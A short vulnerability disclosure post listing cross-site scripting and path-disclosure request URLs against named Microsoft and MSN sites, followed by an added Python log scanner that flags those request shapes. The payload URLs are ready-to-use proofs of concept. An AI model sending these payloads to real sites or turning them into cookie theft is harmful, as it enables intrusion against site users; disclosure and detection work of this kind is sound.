Microsoft ASP.NET Cross Site Scripting and Full Path Disclosure vulnerability

This is based on Microsoft .NET.

Examples of how it can be exploited:

Cross Site Scripting:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://ulogin.bcentral.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://www.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://my.msn.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://dotnet.microsoft.com/<script>alert(document.cookie)</script>.aspx
http://terraserver.microsoft.net/<script>alert(document.cookie)</script>.aspx
http://support.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://office.microsoft.com/~/<script>alert(document.cookie)</script>.aspx?aspxerrorpath=null
http://communities.microsoft.com/~/<script>alert(document.cookie)</script>.aspx
http://uddi.microsoft.com/~/<script>alert(document.cookie)</script>.aspx

This vulnerability exists on older .NET versions:

Full Path Disclosure vulnerability:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://terraserver.microsoft.com/a%5c.aspx
http://uddi.microsoft.com/a%5c.aspx

I posted via the Microsoft security subscribe website that there is a vulnerability, and how to exploit it on one of their sites, a long time ago (1/2 year ago), and haven't got any response from them.

--
Johannes Westerink
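
A defender-side check for the two request shapes listed above, as an added example that is not part of the original post: it flags logged requests whose decoded `.aspx` path contains markup characters or a backslash. The log lines, the `classify` and `scan` functions and the finding names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2003:10:00:00 +0000] "GET /default.aspx HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2003:10:00:05 +0000] '
    '"GET /~/%3Cscript%3Ex%3C/script%3E.aspx?aspxerrorpath=null HTTP/1.1" 404 1800',
    '203.0.113.9 - - [01/Jan/2003:10:00:09 +0000] "GET /a%5c.aspx HTTP/1.1" 500 2300',
    '203.0.113.7 - - [01/Jan/2003:10:00:12 +0000] "GET /search.aspx?q=a%3Cb HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # characters that matter if the path is echoed into HTML


def classify(line):
    """Return the set of findings for one log line, looking at the URL path only."""
    match = REQUEST_RE.search(line)
    if not match:
        return set()
    # Split off the query string first, then percent-decode the path on its own,
    # so an encoded '?' or '<' inside the path is not lost or misattributed.
    path = unquote(urlsplit(match.group(1)).path)
    findings = set()
    if not path.lower().endswith(".aspx"):
        return findings
    if MARKUP_RE.search(path):
        findings.add("markup-in-path")      # shape of the cross-site scripting requests
    if "\\" in path:
        findings.add("backslash-in-path")   # shape of the path-disclosure requests (%5c)
    return findings


def scan(lines):
    """Return (line_number, sorted findings) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, sorted(findings)))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

The fourth sample line is deliberately not flagged: markup in a query-string value is a different input channel from the path segment these requests rely on.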